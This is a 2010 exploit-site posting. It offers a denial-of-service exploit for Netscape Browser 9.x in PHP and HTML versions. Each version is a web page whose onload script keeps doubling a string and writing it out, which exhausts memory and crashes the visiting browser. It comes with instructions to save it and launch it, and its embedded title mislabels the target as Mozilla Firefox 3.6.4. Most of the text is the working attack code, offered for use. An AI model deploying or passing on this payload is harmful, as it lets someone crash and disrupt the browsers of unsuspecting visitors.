Netscape Browser 9.x Denial of Service Exploit
Posted on 29 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Netscape Browser 9.x Denial of Service Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================== Netscape Browser 9.x Denial of Service Exploit ============================================== ############################################################################## # Author : GlaDiaT0R # Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com # Team : Tunisian Power Team ( DarkGh0st.Net ) # Greetz : ALLAH ! , Boomrang_victim, Marwen_Neo, Alphanix, Zigma & my friends ############################################################################## # Date: 29/06/2010 # Software Link: http://browser.netscape.com/releases # Version: 9.x # Platform / Tested on: Windows XP , Windows Vista & Windows 7 # Category: DOS ############################################################################## [+] : Save it at exploit.php or exploit.html and by launching this code the browser will not respond and it will crash . [+] : Exploit ===================== PHP ===================== exploit.php <?php echo "<html><title>Mozilla Firefox 3.6.4 Denial of Service Exploit </title> "; echo "<script> "; echo "function junk() "; echo "{ "; echo "var buff="A"; "; echo "for (i=0;i<787;i++) "; echo "{ "; echo "buff+=buff+"A"; "; echo "document.write(buff+buff); "; echo "} "; echo "} "; echo "</script> "; echo "<body onload="javascript:junk();"> "; echo "<font color=white>the_gl4di4t0r<font color="grey">[AT]</font>hotmail<font color="grey">[DOT]</font>com</font> "; echo "</body> "; echo "</html> "; echo " "; ?> ===================== HTML ===================== exploit.html <html><title>Mozilla Firefox 3.6.4 Denial of Service Exploit </title> <script> function junk() { var buff="A"; for (i=0;i<787;i++) { buff+=buff+"A"; document.write(buff+buff); } } </script> <body onload="javascript:junk();"> <font color=white>the_gl4di4t0r<font color="grey">[AT]</font>hotmail<font color="grey">[DOT]</font>com</font> </body> </html> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>